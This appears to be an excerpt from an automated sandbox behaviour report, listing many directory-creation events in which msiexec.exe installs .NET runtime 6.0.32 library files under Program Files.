                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Overlapped.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\coreclr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Metadata.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-private-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-math-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Memory.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Handles.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XDocument.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\msquic.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-rtlsupport-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.HttpListener.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.NETCore.App.deps.jsonJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.ZipFile.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\ucrtbase.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.Native.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebSockets.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Web.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.FileSystem.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebProxy.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-debug-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.Linq.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-string-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.OpenSsl.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.Brotli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebSockets.Client.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ValueTuple.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.DiaSymReader.Native.amd64.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Timer.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Transactions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Linq.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Algorithms.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-filesystem-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.MemoryMappedFiles.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.DispatchProxy.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.TypeConverter.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\createdump.exeJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-processenvironment-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-heap-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.StackTrace.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.ServicePoint.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.IsolatedStorage.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-util-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.NetworkInformation.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.Immutable.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.Uri.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Configuration.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Linq.Queryable.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Drawing.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-conio-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebClient.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Data.DataSetExtensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.VisualBasic.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Linq.Parallel.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-processthreads-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Requests.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Tools.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.AppContext.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Sockets.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.NonGeneric.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-namedpipe-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Web.HttpUtility.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-interlocked-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Json.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.Parallel.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-profile-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Debug.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-convert-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscorlib.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XPath.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Data.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.Concurrent.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.Win32.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Principal.Windows.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.TextWriterTraceListener.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-handle-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\netstandard.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.Watcher.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XPath.XDocument.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-utility-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.NameResolution.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Globalization.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encodings.Web.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Http.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-file-l1-2-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Drawing.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.Xml.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.AccessControl.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.DataAnnotations.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encoding.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Principal.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-heap-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.EventBasedAsync.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.RegularExpressions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Numerics.Vectors.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Dynamic.Runtime.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.Win32.Registry.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Claims.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.Xml.Linq.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\hostpolicy.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Resources.Writer.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Csp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.TraceSource.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.InteropServices.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-processthreads-l1-1-1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.DataContractSerialization.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Mail.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscordbi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Http.Json.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.TypeExtensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.AccessControl.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.X509Certificates.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-localization-l1-2-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XmlSerializer.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Thread.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.DriveInfo.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscordaccore_amd64_amd64_6.0.3224.31407.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Process.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.ReaderWriter.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-libraryloader-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-sysinfo-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Loader.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-environment-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Data.Common.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Intrinsics.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ObjectModel.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Resources.ResourceManager.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Numerics.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Pipes.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XmlDocument.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Emit.ILGeneration.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.Serialization.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.CompilerServices.VisualC.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.UnmanagedMemoryStream.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Formats.Asn1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Channels.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-timezone-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Quic.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-runtime-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.Dataflow.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Security.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.Json.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Transactions.Local.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Console.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.VisualBasic.Core.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.Formatters.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Tracing.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\dbgshim.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-locale-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\WindowsBase.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\clrjit.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-datetime-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Cng.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Globalization.Calendars.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Core.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscordaccore.dllJump to behavior
